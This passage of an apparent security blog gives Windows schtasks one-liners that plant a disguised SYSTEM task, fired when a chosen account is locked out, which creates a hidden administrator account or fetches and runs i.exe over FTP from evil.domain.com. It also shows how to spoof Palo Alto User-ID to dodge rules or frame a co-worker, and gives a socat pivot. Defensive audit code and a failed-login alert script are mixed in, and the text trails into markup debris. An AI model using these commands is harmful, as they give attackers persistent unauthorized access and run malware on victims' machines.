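    <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Security"&gt;&lt;Select Path="Security"&gt;*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4740]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
  </EventTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>cmd.exe</Command>
    <Arguments>/k net user Backdoor PLACEHOLDER /add /y /active:yes &amp; net localgroup administrators Backdoor /add &amp; exit</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample of a legitimate monitoring task (hypothetical script path).
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Monitoring\LogUserCreated</URI></RegistrationInfo>
  <Triggers><EventTrigger><Enabled>true</Enabled>
    <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Security"&gt;&lt;Select Path="Security"&gt;*[System[EventID=4720]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
  </EventTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\Scripts\log-user-created.cmd</Command>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, audit_task(xml_text))
```

Real exports are UTF-16 encoded, so read the file in binary mode and pass the bytes to `audit_task` so the parser honours the declared encoding.<br />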
<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">Cool, we have a task that will run and all we have to do is lockout any account on the target computer, or if we managed to install this on a DC any account on the domain.</span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">....wait a minute, that's going to get executed more often than we may intend. That could be bad if you want it to stay under wraps until the trap is ready to spring. So how do we nail it down to if a SPECIFIC account gets locked out??</span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">Our built-in friend wevtutil.exe is the man for the job here. Windows Event Utility can read through the event logs and output specific EventID selections.</span></span><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"> For this instance what we need to do is the following:</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New",Courier,monospace;">wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4740]"</span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">qe security</span> - query the security event log</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">/rd:true</span> - reverse direction, read from newest to oldest</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">/F:text</span> - output it in text format</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">/c:1</span> - Find only the last 1 events (most recent since we have rd set to true)</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">That will output the last instance of an account getting locked out. It will look something like this. This instance is from a domain controller; on a non-domain controller it will look very similar, just with different names:</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New",Courier,monospace;">Event[0]:<br /> Log Name: Security<br /> Source: Microsoft-Windows-Security-Auditing<br /> Date: 2015-03-11T10:12:52.499<br /> Event ID: 4740<br /> Task: User Account Management<br /> Level: Information<br /> Opcode: Info<br /> Keyword: Audit Success<br /> User: N/A<br /> User Name: N/A<br /> Computer: Domain.Controller.fake.internal<br /> Description:<br />A user account was locked out.<br /><br />Subject:<br /> Security ID: S-1-5-18<br /> Account Name: Domain.Controller$<br /> Account Domain: fake<br /> Logon ID: 0x3e7<br /><br />Account That Was Locked Out:<br /> Security ID: S-1-5-21-561012550-38641HK9414-249823312-7894</span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"> Account Name: <span style="font-family: Times, "Times New Roman", serif;"></span>Backupexec<br /><br />Additional Information:<br /> Caller Computer Name: Someserverorworkstation</span></span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;">Okay, that's a lot of info but we really only need the Account Name. So we pipe it to find:</span></span><br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><br /></span></span>
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4740]" | find /i "account name"</span></span></span><br />
<br />
<span style="font-family: Times, "Times New Roman", serif;">Oh wait, there are 2 account names in that file. Happily, since the one we're looking for is the last one, we don't have to get into any tricky stuff, as that one will decide the errorlevel.</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Then we end up with just:</span></span></span></span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> Account Name: Backupexec</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Then we can do another pass to find the specific account we're looking for</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"> </span></span></span></span><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4740]" | find /i "account name" | find /i "triggeraccount"</span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Now would be a good moment to mention the 261 character limit, spaces included, for the /TR option of a scheduled task. Always with the restrictions..... no rest for the wicked.</span></span></span></span></span></span></span></span><br />
<br />
<br />
So we have to get that cut down a bit if we want to keep everything in just the task run option and not write extra stuff to disk. Let's cut out the net user comment part and nix the nul's.<br />
<br />
So we end up with this here:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4740]\" | find /i \"Account Name:\" | find /i \"triggername\" && net user Backdoor 1R3AlG00dP@55w0rd /add /y /active:yes & net localgroup administrators Backdoor /add & exit" /f /ru system /ec Security /sc onevent /mo "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4740]]"</span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">We use our && command (&& = only execute if the previous command was successful) to continue execution if the triggeraccount name is found. We're sitting at a cool 256 characters for the /TR. We're doing good, targeted triggering, creating a user, adding to an administration group. </span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Having an account is cool, but if we don't have access to the server we're stuck looking through the window from the outside, no fun at all. We can do better.</span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Alright, same parameters as before, but we're going to bend the rule slightly about writing files to disk. We'll do a one liner FTP command to retrieve and execute a file. I used some formatting tricks to shoehorn everything in here.</span></span></span></span></span> </span></span></span><br />
<br /><span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;">schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k set &wevtutil qe security /rd:true /f:text /c:1 /q:\"*[System/EventID=4740]\" | find /i \"bob\" &&echo user username> f&echo password>>f&echo bin>>f&echo get i.exe>>f&echo quit>>f&ftp -n -s:f evil.domain.com&start \"\" i.exe&exit" /f /ru system /ec Security /sc onevent /mo "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4740]]"</span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">We start out the same as before, querying the event log for the most recent locked account and checking whether it's our good friend bob. Then we set about writing out our FTP script. Using a couple of space cheats and short file names, we manage to squeeze everything in. Note that you don't need spaces before or after an & or before or after the append >>. That saves us a bunch of characters, which ends up being kind of a big deal since we're limited to 261 characters. Using a single letter for the FTP script file name (f) saves us more space.</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Pretty slick right? What else can we do...</span></span></span></span><br />
<br />
<span style="font-family: "Courier New", Courier, monospace;"><span style="font-family: Times, "Times New Roman", serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Times, "Times New Roman", serif;">Run a task whenever a particular user logs out, change an account's password back every time the password gets changed, set up a backdoor account if you get locked out / deleted; whatever Windows creates an event for, you can create a task for. Your only limits are how specific you want execution to be and 261 characters. Other than that, the world is yours.</span> </span></span></span><br />
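From the defender's side, a task like the ones above is visible in its exported XML: an event trigger, a SYSTEM principal, and a shell interpreter carrying a long chained command line instead of a script path. The following audit sketch is an added example, not code from the original post; the benign task name and script path, the review token list and the placeholder password are assumptions, and both XML samples are constructed.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe"}
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}
# Assumed review list, taken from the commands the post chains; extend locally.
RISKY_TOKENS = ("net user", "net localgroup", "ftp ")

# Constructed sample: the shape of the task the post registers (password replaced).
SUSPECT_XML = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\LocalEventLogRotate</URI></RegistrationInfo>
  <Triggers><EventTrigger><Enabled>true</Enabled>
    <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Security"&gt;&lt;Select Path="Security"&gt;*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4740]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
  </EventTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>"cmd.exe"</Command>
    <Arguments>/k wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4740]" | find /i "Account Name:" | find /i "triggername" &amp;&amp; net user Backdoor PLACEHOLDER /add /y /active:yes &amp; net localgroup administrators Backdoor /add &amp; exit</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample: a legitimate event-triggered alert task (hypothetical name and path).
BENIGN_XML = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\FailedLoginAlert</URI></RegistrationInfo>
  <Triggers><EventTrigger><Enabled>true</Enabled>
    <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Security"&gt;&lt;Select Path="Security"&gt;*[System[EventID=4771]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
  </EventTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>X:\Path\failed_login_alert.cmd</Command>
  </Exec></Actions>
</Task>"""


def audit_task(xml_text):
    """Summarise one exported task and list the reasons it deserves a manual look."""
    root = ET.fromstring(xml_text)
    name = root.findtext("t:RegistrationInfo/t:URI", default="(unnamed)", namespaces=NS)

    # Event triggers store their XPath subscription as escaped XML text.
    event_ids, channels = [], []
    for sub in root.iterfind("t:Triggers/t:EventTrigger/t:Subscription", NS):
        query = sub.text or ""  # ElementTree has already unescaped &lt; and &gt;
        event_ids += [int(n) for n in re.findall(r"EventID\s*=\s*(\d+)", query)]
        channels += re.findall(r'<Select Path="([^"]+)"', query)

    user = root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=NS)
    as_system = user.strip().upper() in SYSTEM_IDS

    reasons = []
    for action in root.iterfind("t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = action.findtext("t:Arguments", default="", namespaces=NS)
        exe = re.split(r"[\\/]", command)[-1].lower()
        if exe in SHELLS and args.strip():
            reasons.append("action is an inline %s command line, not a script on disk" % exe)
        chained = len(re.findall(r"&&|&|\|", args))
        if chained >= 3:
            reasons.append("%d chained/piped commands packed into one action" % chained)
        for token in RISKY_TOKENS:
            if token in args.lower():
                reasons.append("arguments contain '%s'" % token.strip())

    if event_ids and as_system and reasons:
        reasons.insert(0, "runs as SYSTEM on event(s) %s" % event_ids)
    return {
        "name": name,
        "event_ids": event_ids,
        "channels": channels,
        "run_as_system": as_system,
        "reasons": reasons,
        "review": bool(event_ids) and bool(reasons),
    }


if __name__ == "__main__":
    for sample in (SUSPECT_XML, BENIGN_XML):
        result = audit_task(sample)
        print(result["name"], "-> review" if result["review"] else "-> ok")
        for reason in result["reasons"]:
            print("   ", reason)
```

Feed it the XML that `schtasks /query /tn <task name> /xml` prints for each task; a task name that sits under Microsoft\Windows does not make the task Microsoft's.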
<br />
Masquerading on Palo Alto User-ID Tracking<br />
Posted 2013-07-17<br />
<br />
A lot of next gen firewalls have the ability to tag web browsing with a user associated to the computer it came from. I'm going to show you how to change who the firewall thinks you are for Palo Alto User-ID, and likely other devices.<br />
<br />
Palo Alto uses a secondary software package called User-ID Agent. This software monitors the event log on domain controllers and pulls the username associated with a computer from the event log. So when you log on, an event is registered with the domain controller, and User-ID Agent pulls the info and updates its data with who is logged in.<br />
<br />
If you do a runas /user:domain\user (must have the actual credentials) and start any application, that will register on the domain controller as a new logon to that computer and will adjust the user appropriately. It does not change back or register as "no user" if there is a logoff, only logons change it. So from that point on all traffic is associated with a different user, still your IP address but it says "User x was logged into the computer at this time".<br />
<br />
Palo Alto can do traffic filtering by user ID, so if you knew the login for an account that is unrestricted as far as the firewall rules are concerned, you could log in as yourself, do a runas and start a cmd prompt (or whatever), then close it, and all your traffic will be reported as belonging to the other user, possibly bypassing rules set up to block other users' traffic.<br />
<br />
Or you could hang some co-worker as you went to some horrific granny-tranny spanish-mistress bondage porn site and it got registered in the firewall logs and now HR and IT will be grilling some poor soul about their internet browsing habits. <br />
<br />
Things such as opening Outlook will revert it back to reporting your user as logged into the computer, because Outlook authenticates to AD. Anything that authenticates to AD will create a logon event and will change the user reported as logged on to the computer.<br />
<br />
Connect to an SSL page through a Socat Proxy<br />
Posted 2013-07-17<br />
<br />
So let's say you have a device, at a remote location, that has an SSL web page. You can only access it from the local subnet and you don't want to disrupt any users by kicking them off their machine.... or you plan to bounce off a client there, maybe without their knowledge.<br />
<br />
We will make the following conditions for this example:<br />
You're in the 192.168.20.0/24 subnet.<br />
You can access subnet 192.168.3.0/24 <br />
192.168.3.11 - device with an SSL page that is accessible ONLY from the 192.168.3.x/24 subnet<br />
192.168.3.20 - device you have access to on that subnet<br />
192.168.20.10 - your machine<br />
<br />
We can use Socat to make the connection because it has the option for an openssl connection type.<br />
<br />
Copy over Socat, and its dependencies:<br />
cygcrypto-0.9.8.dll<br />
cygminires.dll<br />
cygncurses-8.dll<br />
cygreadline6.dll<br />
cygssl-0.9.8.dll<br />
cygwin1.dll<br />
cygwrap-0.dll<br />
to the 192.168.3.20 machine and issue the following command:<br />
<br />
socat TCP-LISTEN:8100,fork OPENSSL:192.168.3.11:443,verify=0<br />
<br />
This tells socat to start listening on 192.168.3.20 port 8100 (or whatever port is available), and fork incoming connections so it can handle multiple connections at a time.<br />
<br />
*Fork is not really necessary for this example, probably better to leave it out, but if you need multiple connections to the device you need the fork option.<br />
<br />
It then sends that traffic over an OpenSSL connection to 192.168.3.11 port 443, and does NOT verify the SSL cert for the page you're trying to connect to (verify=0).<br />
<br />
*You can change it to verify the SSL cert (verify=1), but if the certificate is not correct (i.e. self-signed, or intended to be used on a public site and you're accessing it internally, etc.) the connection will not succeed.<br />
<br />
Then on 192.168.20.10 open your browser and put in 192.168.3.20:8100. Voilà, you have access to your SSL site that requires a connection from the local subnet.<br />
<br />
Now, before we go any further: the connection between 192.168.20.10 and 192.168.3.20 is NOT encrypted. That means anyone sniffing the traffic will see everything that's sent between 192.168.20.10 and 192.168.3.20. That's bad. Especially since you're probably going to have to type in credentials to access the page, and if the sniffer misses that, then there's still the cookie that can be stolen as well.<br />
<br />
Traffic between 192.168.3.20 and 192.168.3.11 IS encrypted, BUT since we have verify=0 it will accept a forged certificate. That's also bad. But if the device has an invalid cert to begin with there's nothing we can do about it.<br />
<br />
You can secure your connection between 192.168.3.20 and 192.168.20.10 by generating SSL certificates (<a href="http://www.dest-unreach.org/socat/doc/socat-openssltunnel.html" target="_blank">instructions can be found here</a>), but that requires access to a system with openssl or some other cert signing software, and since you're likely to be dealing with Windows machines that's unlikely to be handy, but it can be done. You would need to change TCP-LISTEN to OPENSSL-LISTEN also.<br />
<br />
<br />
AD Failed Login Alerting<br />
Posted 2013-04-26<br />
<br />
Using the event triggers of Windows Server 2008, I've set up a script to alert me to failed login attempts and several other events of interest to me.<br />
<br />
Here's how it all rolls together:<br />
<br />
Someone fails a Kerberos login, and an Event ID 4771 gets logged on the DC. I've set up a task to run when this Event ID is triggered. Here's a solid page on how to do that if you're reading this and saying "wtf is this guy talking about": <a href="http://www.windowsecurity.com/articles-tutorials/authentication_and_encryption/Attaching-Tasks-Event-Viewer-Logs-Events.html" target="_blank">Tasks based on Event Log Activity</a><br />
<br />
At first I just had it set up to send me an email to let me know that a failed login had occurred. I quickly found out that there are a LOT of failed logins per day on my domain, ~100. We have a lot of users, so it makes sense now that I think about it and see how often it happens. Since, in their infinite wisdom, Microsoft didn't include an option to attach the event information to the email, these emails were pretty useless.<br />
<br />
So now we need to find a way to get the information from the event log into an email.<br />
<br />
Wevtutil is a nifty little Windows utility (included natively) that can query the event log and output the event info to a file. That's handy. I'll be honest, the syntax is a bit confusing to me, but I got it to do what I needed.<br />
<br />
wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4771]" > file.txt<br />
<br />
"qe security" is to query the security log <br />
/rd:true is reverse direction, aka read from the newest event to the oldest<br />
/f:text is the output format, there are other options<br />
/c:1 find the first 1 event that matches<br />
/q: XPath query string. I'm not going to go into explaining XPath queries, google is your friend. This one says: find all (*) where System EventID is equal to 4771 (failed login event ID). You can get very specific with the query if you'd like.<br />
<br />
Now, you can create two tasks to trigger in order when there's an event, so you could set things up like so:<br />
<br />
1. Failed login occurs, event is created in the Event Log.<br />
2. Task 1 for that event is triggered.<br />
3. Use Wevtutil to output the event information to a text file<br />
4. Task 2 for the event is triggered<br />
5. Email is sent with the output from Wevtutil attached<br />
<br />
I don't like that setup; it seems overly complex in my mind. There's no need for 2 tasks when we can have just 1 task and 1 script. I put a copy of my favorite command line emailer, BLAT, in the folder with my script and used that at the end of the script to send out the email.<br />
<br />
-=Script=-<br />
<span style="font-family: "Courier New",Courier,monospace;">@echo off </span><br />
<span style="font-family: "Courier New",Courier,monospace;">wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4771]" > X:\path\file.txt</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> </span> <br />
<span style="font-family: "Courier New",Courier,monospace;">X:\Path\blat.exe X:\path\file.txt -server mail.domain.whatever -subject "Failed Login" -to you@domain.whatever -mailfrom FailedLogin@domain.whatever</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">del /f /q X:\path\file.txt</span><br />
<br />
*You need to make sure you use the full path for everything OR set your task to start in the specified directory in the task options when you create the task. Task. Had to get one last one in there.<br />
<br />
Okay, so now I get an email that a login has failed and I get the full info of the event log for that particular event. We're getting closer, however it's not as "human friendly" as I'd like it to be. Specifically, it doesn't include the user's full name, just the account login name, and it only gives the code for the failed login (0x18 for example) and doesn't tell you that 0x18 means bad username or password. There are many reasons that a login can fail and I for one don't want to try and remember what each error code means.<br />
<br />
So we need to massage the text into an output that has more useful information and is easily readable:<br />
<br />
-=Script=-<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">@echo off<br />wevtutil qe security /rd:true /f:text /c:1 /q:"*[System/EventID=4771]" > X:\Path\failed_login.txt<br /><br />type X:\Path\failed_login.txt | find /i "Account Name" > X:\Path\fail_alert.txt<br /><br />for /f "tokens=3" %%a in ('type X:\Path\failed_login.txt ^| find /i "Account Name"') do set accname=%%a<br /><br />for /f "tokens=2,* delims= " %%a in ('net user %accname% /domain ^| find /i "Full Name"') do echo Full Name: %%b >> X:\Path\fail_alert.txt<br /><br />type X:\Path\failed_login.txt | find /i "Client Address" >> X:\Path\fail_alert.txt<br /><br />type X:\Path\failed_login.txt | find "Failure Code:" >> X:\Path\fail_alert.txt<br /><br />for /f "tokens=2 Delims=x" %%a in ('type X:\Path\failed_login.txt ^| find "Failure Code:"') do set fail=%%a<br /><br />if %fail% == 17 echo Reason Failed: Users Password has Expired >> X:\Path\fail_alert.txt<br /><br />if %fail% == 12 echo Reason Failed: Account Disabled / Account Expired >> X:\Path\fail_alert.txt<br /><br />if %fail% == 18 echo Reason Failed: Bad Username or Password >> X:\Path\fail_alert.txt<br /><br />if %fail% == 25 echo Reason Failed: Workstation Clock too far out of Sync with DC >> X:\Path\fail_alert.txt<br /><br />for /f "tokens=2 delims=:" %%a in ('type X:\Path\failed_login.txt ^| find "Computer:"') do set frm=%%a<br /><br />echo Logged From: %frm% >> X:\Path\fail_alert.txt<br /><br />for /f "tokens=1,* delims=:" %%a in ('type X:\Path\failed_login.txt ^| find "Date:"') do set tme=%%b<br /><br />echo Logged At: %tme% >> X:\Path\fail_alert.txt<br /><br />X:\Path\blat.exe X:\Path\fail_alert.txt -server mailserver -subject "Failed Login" -to you@yourdomain.ext -mailfrom FailedLogin@yourdomain.ext<br /><br />del /f /q X:\Path\failed_login.txt<br /><br />del /f /q X:\Path\fail_alert.txt</span><br />
<br />
<br />
<br />
So what's going on here is this:<br />
<br />
We use wevtutil to query the security log and find the last 1 event with the ID of 4771 (failed login) and output the text of the event to a file (failed_login.txt)<br />
<br />
Then we search the file for the line with "Account Name". This gives us the user account name, and we output that to what will end up being the email body.<br />
<br />
Then we do the same search again, except this time we're going to set just the actual account name as a variable, not the whole line.<br />
<br />
Then we're going to query the domain for that account name and grab the Full Name (their actual name) value. Output that to the email body file.<br />
<br />
Then we search the event output again for the client address (computer the login attempt came from) and the reason it failed (failure code). Output those to the email body file.<br />
<br />
Then we do the search for the failure code again and set it as a variable.<br />
<br />
Then we run through some if statements to check if the failure code is one of the common failure codes. Output that to the email body file.<br />
<br />
*I didn't do a full list of all possible failure codes because there are only a few common ones that happen, also if the failure code isn't one of the common ones something unusual is probably happening and I'm going to have to look it up anyways. Kind of a way to alert me that I need to pay attention through lack of information. You can find a list of failure codes here: <a href="http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4771" target="_blank">Failure Codes</a><br />
<br />
Then we do a search through the wevtutil output again and find the computer that's reporting the failure. Set that as a variable and output it to the email body file, with some formatting.<br />
<br />
Then we do the same thing with the time / date. Output it to the email body file.<br />
<br />
Then we tell BLAT to do its thing and send us an email.<br />
<br />
Then we clean up the files and wait to be triggered again.<br />
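The same field extraction can be done in one pass without temp files. The sketch below is an added example, not the author's script: it parses text in the layout `wevtutil /f:text` prints, reuses the script's four failure-code descriptions, and goes beyond the script by handling several events at once (as `/c:N` with N greater than 1 would return) and collapsing them into a digest that lists unrecognised codes first. The host name, accounts, addresses and dates in the sample are constructed.

```python
import re
from collections import Counter

# Failure-code descriptions worded exactly as in the batch script above.
REASONS = {
    "0x17": "Users Password has Expired",
    "0x12": "Account Disabled / Account Expired",
    "0x18": "Bad Username or Password",
    "0x25": "Workstation Clock too far out of Sync with DC",
}

FIELDS = {
    "account": r"^\s*Account Name:\s*(\S+)",
    "client": r"^\s*Client Address:\s*(\S+)",
    "code": r"^\s*Failure Code:\s*(0x[0-9A-Fa-f]+)",
    "computer": r"^\s*Computer:\s*(\S+)",
    "date": r"^\s*Date:\s*(\S+)",
}


def _sample_event(n, date, account, client, code):
    """Constructed, abbreviated 4771 record in wevtutil's text layout."""
    return f"""Event[{n}]:
  Log Name: Security
  Source: Microsoft-Windows-Security-Auditing
  Date: {date}
  Event ID: 4771
  Computer: DC01.domain.whatever
  Description:
Kerberos pre-authentication failed.

Account Information:
\tAccount Name:\t\t{account}

Network Information:
\tClient Address:\t\t{client}

Additional Information:
\tFailure Code:\t\t{code}

"""


SAMPLE_OUTPUT = "".join([
    _sample_event(0, "2013-04-26T06:12:41.769", "jdoe", "::ffff:192.168.20.10", "0x18"),
    _sample_event(1, "2013-04-26T06:12:30.102", "jdoe", "::ffff:192.168.20.10", "0x18"),
    _sample_event(2, "2013-04-26T06:11:58.440", "asmith", "192.168.20.31", "0x6"),
])


def parse_events(text):
    """Split wevtutil text output into events and pull out the alert fields."""
    events = []
    # Every record starts with an "Event[n]:" header line.
    for block in re.split(r"(?m)^Event\[\d+\]:[ \t]*$", text):
        if not block.strip():
            continue
        event = {}
        for key, pattern in FIELDS.items():
            match = re.search(pattern, block, re.M)
            event[key] = match.group(1) if match else None
        if event["client"]:
            # IPv4 clients are logged in IPv4-mapped IPv6 form.
            event["client"] = event["client"].replace("::ffff:", "")
        if event["code"]:
            event["code"] = event["code"].lower()
        # None means the code is not one of the common four.
        event["reason"] = REASONS.get(event["code"])
        events.append(event)
    return events


def build_digest(events):
    """One line per (account, client, code) with a count, unrecognised codes first."""
    counts = Counter((e["account"], e["client"], e["code"]) for e in events)
    ordered = sorted(
        counts.items(),
        key=lambda kv: (kv[0][2] in REASONS, -kv[1], str(kv[0])),
    )
    lines = []
    for (account, client, code), n in ordered:
        reason = REASONS.get(code, "UNRECOGNISED CODE, look it up")
        lines.append(f"{n}x {account} from {client}: {code} {reason}")
    return lines


if __name__ == "__main__":
    print("\n".join(build_digest(parse_events(SAMPLE_OUTPUT))))
```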
<br />
We end up getting an email with a body similar to this:<br />
<br />
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
